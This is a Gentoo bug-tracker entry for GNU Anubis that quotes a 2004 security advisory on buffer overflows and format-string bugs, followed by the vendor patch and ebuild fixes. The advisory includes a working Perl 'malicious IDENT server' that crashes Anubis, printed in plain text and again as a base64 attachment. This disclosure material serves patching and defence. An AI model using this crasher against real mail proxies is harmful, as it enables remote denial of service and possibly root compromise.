43764 2004-03-04 18:48 0000 GNU Anubis buffer overflows and format string bugs 2004-03-15 18:35:27 0000 1 1 1 Unclassified Gentoo Linux Security unspecified All Linux RESOLVED FIXED P2 normal --- 1 dmonnier@iu.edu security@gentoo.org dmonnier@iu.edu 2004-03-04 18:48:42 0000 Message-Id: <1078427980.4047814c1dfe5@webmail.uu.se> Date: Thu, 4 Mar 2004 20:19:40 +0100 From: Ulf =?iso-8859-1?b?SORybmhhbW1hcg==?= <Ulf.Harnhammar.9485@student.uu.se> Reply-To: ulf.harnhammar.9485@student.uu.se To: bugtraq@securityfocus.com Cc: full-disclosure@lists.netsys.com Subject: GNU Anubis buffer overflows and format string bugs Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="-MOQ1078427979a860bcf4bfdea716514571254e9995fd" User-Agent: Internet Messaging Program (IMP) 3.2.1 ---MOQ1078427979a860bcf4bfdea716514571254e9995fd Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Subject: GNU Anubis buffer overflows and format string bugs PROGRAM: GNU Anubis VENDOR: Free Software Foundation, Inc. HOMEPAGE: http://www.gnu.org/software/anubis/ VULNERABLE VERSIONS: 3.6.2, 3.9.93, 3.9.92, 3.6.0, 3.6.1, possibly others IMMUNE VERSIONS: 3.6.2 with vendor patch, 3.9.93 with vendor patch, latest CVS REFERENCES: not yet * DESCRIPTION * "GNU Anubis is an outgoing mail processor. It goes between the MUA (Mail User Agent) and the MTA (Mail Transport Agent), and can perform various sorts of processing and conversion on-the-fly in accordance with the sender's specified rules, based on a highly configurable regular expressions system. It operates as a proxy server, and can edit outgoing mail headers, encrypt or sign mail with the GnuPG, build secure SMTP tunnels using the TLS/SSL encryption even if your mail user agent doesn't support it, or tunnel a connection through a SOCKS proxy server." (quoted from freshmeat.net) * SUMMARY * I have found two buffer overflows and three format string bugs in GNU Anubis. They can all be remotely exploited, potentially to get root access, as GNU Anubis usually runs as root and drops its privileges after executing some of the vulnerable functions. * TECHNICAL DETAILS * a) There are two buffer overflows in the function auth_ident() in auth.c. The overflows are caused by sscanf() format strings of the type "%s" instead of "%63s". b) There are format string bugs in three instances of the syslog() call. They are located in the function info() in log.c, the function anubis_error() in errs.c and the function ssl_error() in ssl.c. The vulnerable functions take strings partially made up of user-supplied data, and use them as the format string instead of using them as parameters ('syslog(priority, string);' instead of 'syslog(priority, "%s", string);'). These format string bugs become a bigger problem if you set termlevel to VERBOSE or DEBUG, as GNU Anubis then will log more data with the syslog() facility. * SOLUTION * The vendor has released official security patches for 3.6.2 and 3.9.93. They can be downloaded from the program's homepage. They correct both the buffer overflows and the format string bugs. * MALICIOUS IDENT SERVER * One of the methods of attacking GNU Anubis is through IDENT data, as it always connects to the client's IDENT server to get more information about the client. I wrote a simple malicious IDENT server in Perl. It crashes the current instance of GNU Anubis, either by using the buffer overflows or by using the format string bugs. Here it is: #!/usr/bin/perl -- # anubis-crasher # Ulf Harnhammar 2004 # I hereby place this program in the Public Domain. use IO::Socket; sub usage() { die "usage: $0 type\n". "type is 'a' (buffer overflow) or 'b' (format string bug).\n"; } # sub usage $port =3D 113; usage() unless @ARGV =3D=3D 1; $type =3D shift; usage() unless $type =3D~ m|^[ab]$|; $send{'a'} =3D 'U' x 400; $send{'b'} =3D '%n' x 28; $sendstr =3D $send{$type}; $server =3D IO::Socket::INET->new(Proto =3D> 'tcp', LocalPort =3D> $port, Listen =3D> SOMAXCONN, Reuse =3D> 1) or die "can't create server: $!"; while ($client =3D $server->accept()) { $client->autoflush(1); print "got a connection\n"; $input =3D <$client>; $input =3D~ tr/\015\012//d; print "client said $input\n"; # $wait =3D <STDIN>; # $wait =3D 'be quiet, perl -wc'; $output =3D "a: USERID: a:$sendstr"; print $client "$output\n"; print "I said $output\n"; close $client; print "disconnected\n"; } # while client=3Dserver->accept __END__ * 31337 IRC KIDDIES * K: "w0w d00d m0r3 buphph3r 0v3rphl0wzZz 4nd ph0rm4t zZztr1ngzZz!!1! but why d0 y4 p0zZzt 4b0ut th4t xss ph1lt3r??+??+? w3 1n 'h4ck3rzZz phr0m h3ll' r n0t 4muzZz3d!! xss 1zZzn't r34lly 4 vuln3r4b1l1ty c0z 1t'zZz 34zZzy t0 3xpl01t th4t vuln3r4b1l1ty 4nd th3n u c4n't pr00v3 h0w 31337 u r!!! th3 n31ghb0ur'zZz d4ught3r 1zZz r34lly cut3 4nd 1ph 1 ph1nd l0tzZz 0ph buphph3r 0v3rphl0wzZz zZzh3'll b3 1mpr3zZzZzZ3d 4nd g0 t0 th3 m0v13zZz w1th m3 but th4t w0n't h4pp3n 1ph 1 ph1nd xss h0l3zZz!!!!11!!!1!!11!!!!" U: "Virgin." (Anyone on IRC who doesn't behave like K here is of course OK.) // Ulf Harnhammar kses - 31337 PHP HTML/XHTML filter (no XSS) http://sourceforge.net/projects/kses ---MOQ1078427979a860bcf4bfdea716514571254e9995fd Content-Type: application/octet-stream; name="anubis-crasher.pl" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="anubis-crasher.pl" IyEvdXNyL2Jpbi9wZXJsIC0tCgojIGFudWJpcy1jcmFzaGVyCiMgVWxmIEhhcm5oYW1tYXIgMjAw NAojIEkgaGVyZWJ5IHBsYWNlIHRoaXMgcHJvZ3JhbSBpbiB0aGUgUHVibGljIERvbWFpbi4KCnVz ZSBJTzo6U29ja2V0OwoKCnN1YiB1c2FnZSgpCnsKICBkaWUgInVzYWdlOiAkMCB0eXBlXG4iLgog ICAgICAidHlwZSBpcyAnYScgKGJ1ZmZlciBvdmVyZmxvdykgb3IgJ2InIChmb3JtYXQgc3RyaW5n IGJ1ZykuXG4iOwp9ICMgc3ViIHVzYWdlCgoKJHBvcnQgPSAxMTM7Cgp1c2FnZSgpIHVubGVzcyBA QVJHViA9PSAxOwokdHlwZSA9IHNoaWZ0Owp1c2FnZSgpIHVubGVzcyAkdHlwZSA9fiBtfF5bYWJd JHw7Cgokc2VuZHsnYSd9ID0gJ1UnIHggNDAwOwokc2VuZHsnYid9ID0gJyVuJyB4IDI4Owokc2Vu ZHN0ciA9ICRzZW5keyR0eXBlfTsKCiRzZXJ2ZXIgPSBJTzo6U29ja2V0OjpJTkVULT5uZXcoUHJv dG8gPT4gJ3RjcCcsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG9jYWxQb3J0ID0+ ICRwb3J0LAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExpc3RlbiA9PiBTT01BWENP Tk4sCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmV1c2UgPT4gMSkgb3IKICAgICAg ICAgIGRpZSAiY2FuJ3QgY3JlYXRlIHNlcnZlcjogJCEiOwoKd2hpbGUgKCRjbGllbnQgPSAkc2Vy dmVyLT5hY2NlcHQoKSkKewogICRjbGllbnQtPmF1dG9mbHVzaCgxKTsKICBwcmludCAiZ290IGEg Y29ubmVjdGlvblxuIjsKCiAgJGlucHV0ID0gPCRjbGllbnQ+OwogICRpbnB1dCA9fiB0ci9cMDE1 XDAxMi8vZDsKICBwcmludCAiY2xpZW50IHNhaWQgJGlucHV0XG4iOwoKIyAgJHdhaXQgPSA8U1RE SU4+OwojICAkd2FpdCA9ICdiZSBxdWlldCwgcGVybCAtd2MnOwoKICAkb3V0cHV0ID0gImE6IFVT RVJJRDogYTokc2VuZHN0ciI7CiAgcHJpbnQgJGNsaWVudCAiJG91dHB1dFxuIjsKICBwcmludCAi SSBzYWlkICRvdXRwdXRcbiI7CgogIGNsb3NlICRjbGllbnQ7CiAgcHJpbnQgImRpc2Nvbm5lY3Rl ZFxuIjsKfSAjIHdoaWxlIGNsaWVudD1zZXJ2ZXItPmFjY2VwdAoKX19FTkRfXwo= ---MOQ1078427979a860bcf4bfdea716514571254e9995fd-- Reproducible: Always Steps to Reproduce: 1. 2. 3. A patch is mentioned in the advisory, will get it added here. dmonnier@iu.edu 2004-03-04 18:52:27 0000 Created an attachment (id=26872) anubis-3.6.2 patch http://savannah.gnu.org/patch/?func=detailitem&item_id=2699 dmonnier@iu.edu 2004-03-10 10:56:35 0000 Remote exploit published. http://www.securityfocus.com/archive/1/356928 If there's no one maintaining this I'll get the ebuild updated as soon as I can. -Dave dmonnier@iu.edu 2004-03-11 22:55:51 0000 Created an attachment (id=27231) ebuild patch to resolve the vulnerability. --- /usr/portage/net-mail/anubis/anubis-3.6.2.ebuild 2003-09-05 04:08:59.0000 00000 -0500 +++ /usr/local/portage/net-mail/anubis/anubis-3.6.2.ebuild 2004-03-12 01:34 :08.894638904 -0500 @@ -19,6 +19,12 @@ S=${WORKDIR}/${P} +src_unpack() { + unpack ${P}.tar.gz + + epatch ${FILESDIR}/${P}-securityfixes.patch +} + src_compile() { local myconf dmonnier@iu.edu 2004-03-13 09:38:18 0000 anubis-3.6.2-r1.ebuild ====================== DESCRIPTION="GNU Anubis is an outgoing mail processor." HOMEPAGE="http://www.gnu.org/software/anubis/" SRC_URI="mirror://gnu/anubis/${P}.tar.gz" LICENSE="GPL-2" SLOT="0" KEYWORDS="x86" IUSE="ssl pam tcpd crypt" DEPEND="crypt? ( >=app-crypt/gpgme-0.3.13 ) ssl? ( >=dev-libs/openssl-0.9.6 ) pam? ( >=sys-libs/pam-0.75 ) tcpd? ( >=sys-apps/tcp-wrappers-7.6 ) >=dev-libs/libpcre-3.9" S=${WORKDIR}/${P} src_unpack() { unpack ${P}.tar.gz epatch ${FILESDIR}/${P}-securityfixes.patch } src_compile() { local myconf myconf="--with-pcre" use crypt || myconf="${myconf} --without-gpgme" use ssl && myconf="${myconf} --with-openssl" use pam && myconf="${myconf} --with-pam" use tcpd && myconf="${myconf} --with-tcp-wrappers" ./configure ${myconf} --prefix=/usr --host=${CHOST} || die emake || die } src_install() { einstall } lisa@gentoo.org 2004-03-15 18:35:27 0000 Fixed in cvs as 3.6.2-r1. blame cshields for breakage. 26872 2004-03-04 18:52 0000 anubis-3.6.2 patch anubis-3.6.2-securityfixes.patch application/octet-stream ZGlmZiAtdXJOIGFudWJpcy0zLjYuMi9zcmMvYXV0aC5jIGFudWJpcy0zLjYuMi1maXgvc3JjL2F1 dGguYwotLS0gYW51YmlzLTMuNi4yL3NyYy9hdXRoLmMJV2VkIERlYyAgNCAyMjo0MzozNCAyMDAy CisrKyBhbnViaXMtMy42LjItZml4L3NyYy9hdXRoLmMJV2VkIEZlYiAyNSAyMDoyOTo0MCAyMDA0 CkBAIC00Miw2ICs0Miw2NiBAQAogIElERU5UIHByb3RvY29sIHN1cHBvcnQKICoqKioqKioqKioq KioqKioqKioqKioqKi8KIAorI2RlZmluZSBVU0VSTkFNRV9DICJVU0VSSUQgOiIKKworLyogSWYg dGhlIHJlcGx5IG1hdGNoZXMgc3NjYW5mIGV4cHJlc3Npb24KKyAgIAorICAgICAgIiUqW146XTog VVNFUklEIDolKlteOl06JXMiCisKKyAgIGFuZCB0aGUgbGVuZ3RoIG9mICIlcyIgcGFydCBkb2Vz IG5vdCBleGNlZWQgc2l6ZS0xIGJ5dGVzLAorICAgY29waWVzIHRoaXMgcGFydCB0byBVU0VSTkFN RSBhbmQgcmV0dXJucyAwLiBPdGhlcndpc2UsCisgICByZXR1cm5zIDEgKi8KKworc3RhdGljIGlu dAoraWRlbnRfZXh0cmFjdF91c2VybmFtZShjaGFyICpyZXBseSwgY2hhciAqdXNlcm5hbWUsIHNp emVfdCBzaXplKQoreworCWNoYXIgKnA7CisKKwlwID0gc3RyY2hyIChyZXBseSwgJzonKTsKKwlp ZiAoIXApCisJCXJldHVybiAxOworCWlmIChwWzFdICE9ICcgJworCSAgICB8fCBzdHJuY21wIChw ICsgMiwgVVNFUk5BTUVfQywgc2l6ZW9mIChVU0VSTkFNRV9DKSAtIDEpKQorCQlyZXR1cm4gMTsK KwlwICs9IDIgKyBzaXplb2YgKFVTRVJOQU1FX0MpIC0gMTsKKwlwID0gc3RyY2hyIChwLCAnOicp OworCWlmICghcCkKKwkJcmV0dXJuIDE7CisJcCsrOworCWlmIChzdHJsZW4gKHApID49IHNpemUp CisJCXJldHVybiAxOworCXN0cmNweSh1c2VybmFtZSwgcCk7CisJcmV0dXJuIDA7Cit9CisKKy8q IElmIHRoZSByZXBseSBtYXRjaGVzIHNzY2FuZiBleHByZXNzaW9uCisKKyAgICAgICIlKlteIF0g JSpbXiBdICUqW14gXSAlKlteIF0gJSpbXiBdICVzIgorCisgICBhbmQgdGhlIGxlbmd0aCBvZiAi JXMiIHBhcnQgZG9lcyBub3QgZXhjZWVkIHNpemUtMSBieXRlcywKKyAgIGNvcGllcyB0aGlzIHBh cnQgdG8gVVNFUk5BTUUgYW5kIHJldHVybnMgMC4gT3RoZXJ3aXNlLAorICAgcmV0dXJucyAxICov CisKK3N0YXRpYyBpbnQKK2NyeXB0X2V4dHJhY3RfdXNlcm5hbWUoY2hhciAqcmVwbHksIGNoYXIg KnVzZXJuYW1lLCBzaXplX3Qgc2l6ZSkKK3sKKwlpbnQgaTsKKwljaGFyICpwID0gcmVwbHk7Cisj ZGVmaW5lIHNraXBfd29yZChjKSB3aGlsZSAoKmMgJiYgKCpjKSAhPSAnICcpIGMrKworCisJLyog U2tpcCBmaXZlIHdvcmRzICovCisJZm9yIChpID0gMDsgaSA8IDU7IGkrKykgeworCQlza2lwX3dv cmQocCk7CisJCWlmICghKnArKykKKwkJCXJldHVybiAxOworCX0KKwkKKwlpZiAoc3RybGVuIChw KSA+PSBzaXplKQorCQlyZXR1cm4gMTsKKwlzdHJjcHkodXNlcm5hbWUsIHApOworCXJldHVybiAw OworfQorCiBpbnQKIGF1dGhfaWRlbnQoc3RydWN0IHNvY2thZGRyX2luICphZGRyLCBjaGFyICp1 c2VyLCBpbnQgc2l6ZSkKIHsKQEAgLTUxLDcgKzExMSw4IEBACiAJaW50IHNkID0gMDsKIAogCWlm ICgoc2QgPSBzb2NrZXQoQUZfSU5FVCwgU09DS19TVFJFQU0sIDApKSA8IDApIHsKLQkJYW51Ymlz X2Vycm9yKFNPRlQsIF8oIklERU5UOiBzb2NrZXQoKSBmYWlsZWQ6ICVzLiIpLCBzdHJlcnJvcihl cnJubykpOworCQlhbnViaXNfZXJyb3IoU09GVCwgXygiSURFTlQ6IHNvY2tldCgpIGZhaWxlZDog JXMuIiksCisJCQkgICAgIHN0cmVycm9yKGVycm5vKSk7CiAJCXJldHVybiAwOwogCX0KIAltZW1j cHkoJmlkZW50LCBhZGRyLCBzaXplb2YoaWRlbnQpKTsKQEAgLTY5LDExICsxMzAsNyBAQAogCWlu Zm8oVkVSQk9TRSwgXygiSURFTlQ6IGNvbm5lY3RlZCB0byAlczoldSIpLAogCWluZXRfbnRvYShp ZGVudC5zaW5fYWRkciksIG50b2hzKGlkZW50LnNpbl9wb3J0KSk7CiAKLQkjaWZkZWYgSEFWRV9T TlBSSU5URgogCXNucHJpbnRmKGJ1ZiwgTElORUJVRkZFUiwKLQkjZWxzZQotCXNwcmludGYoYnVm LAotCSNlbmRpZiAvKiBIQVZFX1NOUFJJTlRGICovCiAJCSIldSAsICV1IkNSTEYsIG50b2hzKGFk ZHItPnNpbl9wb3J0KSwgc2Vzc2lvbi50dW5uZWxfcG9ydCk7CiAKIAlpZiAoc2VuZChzZCwgYnVm LCBzdHJsZW4oYnVmKSwgMCkgPT0gLTEpIHsKQEAgLTg5LDcgKzE0Niw4IEBACiAJY2xvc2Vfc29j a2V0KHNkKTsKIAltZW1zZXQodXNlciwgMCwgc2l6ZSk7CiAKLQlpZiAoc3NjYW5mKGJ1ZiwgIiUq W146XTogVVNFUklEIDolKlteOl06JXMiLCB1c2VyKSAhPSAxKSB7CisJcmVtY3JsZiAoYnVmKTsK KwlpZiAoaWRlbnRfZXh0cmFjdF91c2VybmFtZShidWYsIHVzZXIsIHNpemUpKSB7CiAJCWluZm8o VkVSQk9TRSwgXygiSURFTlQ6IGluY29ycmVjdCBkYXRhLiIpKTsKIAkJcmV0dXJuIDA7CiAJfQpA QCAtMTA1LDcgKzE2Myw4IEBACiAJCWlmIChycyA9PSAtMSkKIAkJCXJldHVybiAwOwogCi0JCWlm IChzc2NhbmYoYnVmLCAiJSpbXiBdICUqW14gXSAlKlteIF0gJSpbXiBdICUqW14gXSAlcyIsIHVz ZXIpICE9IDEpIHsKKwkJcmVtY3JsZiAoYnVmKTsKKwkJaWYgKGNyeXB0X2V4dHJhY3RfdXNlcm5h bWUoYnVmLCB1c2VyLCBzaXplKSkgewogCQkJaW5mbyhWRVJCT1NFLCBfKCJJREVOVDogaW5jb3Jy ZWN0IGRhdGEgKERFUyBkZWNpcGhlcmVkKS4iKSk7CiAJCQlyZXR1cm4gMDsKIAkJfQpkaWZmIC11 ck4gYW51YmlzLTMuNi4yL3NyYy9lcnJzLmMgYW51YmlzLTMuNi4yLWZpeC9zcmMvZXJycy5jCi0t LSBhbnViaXMtMy42LjIvc3JjL2VycnMuYwlXZWQgRGVjICA0IDIyOjQyOjAyIDIwMDIKKysrIGFu dWJpcy0zLjYuMi1maXgvc3JjL2VycnMuYwlXZWQgRmViIDI1IDIwOjMzOjQ5IDIwMDQKQEAgLTUx LDcgKzUxLDcgQEAKIAkJCWlmIChvcHRpb25zLnNsb2dmaWxlKQogCQkJCWZpbGVsb2cob3B0aW9u cy5zbG9nZmlsZSwgdHh0KTsKIAkJCWVsc2UKLQkJCQlzeXNsb2coTE9HX0VSUiB8IExPR19NQUlM LCB0eHQpOworCQkJCXN5c2xvZyhMT0dfRVJSIHwgTE9HX01BSUwsICIlcyIsIHR4dCk7CiAKIAkJ CWlmIChvcHRpb25zLnVsb2dmaWxlICYmIG9wdGlvbnMudWxvZ2xldmVsID49IEZBSUxTKQogCQkJ CWZpbGVsb2cob3B0aW9ucy51bG9nZmlsZSwgdHh0KTsKZGlmZiAtdXJOIGFudWJpcy0zLjYuMi9z cmMvbG9nLmMgYW51YmlzLTMuNi4yLWZpeC9zcmMvbG9nLmMKLS0tIGFudWJpcy0zLjYuMi9zcmMv bG9nLmMJV2VkIERlYyAgNCAyMjo0MjoyNiAyMDAyCisrKyBhbnViaXMtMy42LjItZml4L3NyYy9s b2cuYwlXZWQgRmViIDI1IDIwOjMyOjMwIDIwMDQKQEAgLTcwLDcgKzcwLDcgQEAKIAkJaWYgKG9w dGlvbnMuc2xvZ2ZpbGUpCiAJCQlmaWxlbG9nKG9wdGlvbnMuc2xvZ2ZpbGUsIHR4dCk7CiAJCWVs c2UKLQkJCXN5c2xvZyhMT0dfSU5GTyB8IExPR19NQUlMLCB0eHQpOworCQkJc3lzbG9nKExPR19J TkZPIHwgTE9HX01BSUwsICIlcyIsIHR4dCk7CiAKIAkJaWYgKG9wdGlvbnMudWxvZ2ZpbGUgJiYg b3B0aW9ucy51bG9nbGV2ZWwgPj0gQUxMKQogCQkJZmlsZWxvZyhvcHRpb25zLnVsb2dmaWxlLCB0 eHQpOwpkaWZmIC11ck4gYW51YmlzLTMuNi4yL3NyYy9zc2wuYyBhbnViaXMtMy42LjItZml4L3Ny Yy9zc2wuYwotLS0gYW51YmlzLTMuNi4yL3NyYy9zc2wuYwlXZWQgRGVjICA0IDIyOjQwOjQ1IDIw MDIKKysrIGFudWJpcy0zLjYuMi1maXgvc3JjL3NzbC5jCVdlZCBGZWIgMjUgMjA6MzM6MjggMjAw NApAQCAtNjQsNyArNjQsNyBAQAogCWlmIChvcHRpb25zLnRlcm1sZXZlbCAhPSBTSUxFTlQpIHsK IAkJI2lmZGVmIEhBVkVfU1lTTE9HCiAJCWlmICgodG9wdCAmIFRfREFFTU9OKSAmJiAhKHRvcHQg JiBUX0ZPUkVHUk9VTkQpKQotCQkJc3lzbG9nKExPR19FUlIgfCBMT0dfTUFJTCwgc3RyaW5nX2Vy cm9yKTsKKwkJCXN5c2xvZyhMT0dfRVJSIHwgTE9HX01BSUwsICIlcyIsIHN0cmluZ19lcnJvcik7 CiAJCWVsc2UKIAkJI2VuZGlmIC8qIEhBVkVfU1lTTE9HICovCiAJCQltcHJpbnRmKCI+PiVzIiwg c3RyaW5nX2Vycm9yKTsK 27231 2004-03-11 22:55 0000 ebuild patch to resolve the vulnerability. anubis-3.6.2-r1.ebuild-patch text/plain LS0tIC91c3IvcG9ydGFnZS9uZXQtbWFpbC9hbnViaXMvYW51YmlzLTMuNi4yLmVidWlsZAkyMDAz LTA5LTA1IDA0OjA4OjU5LjAwMDAwMDAwMCAtMDUwMAorKysgL3Vzci9sb2NhbC9wb3J0YWdlL25l dC1tYWlsL2FudWJpcy9hbnViaXMtMy42LjIuZWJ1aWxkCTIwMDQtMDMtMTIgMDE6MzQ6MDguODk0 NjM4OTA0IC0wNTAwCkBAIC0xOSw2ICsxOSwxMiBAQAogCiBTPSR7V09SS0RJUn0vJHtQfQogCitz cmNfdW5wYWNrKCkgeworICAgICAgICB1bnBhY2sgJHtQfS50YXIuZ3oKKworICAgICAgICBlcGF0 Y2ggJHtGSUxFU0RJUn0vJHtQfS1zZWN1cml0eWZpeGVzLnBhdGNoCit9CisKIHNyY19jb21waWxl KCkgewogCWxvY2FsIG15Y29uZgogCg==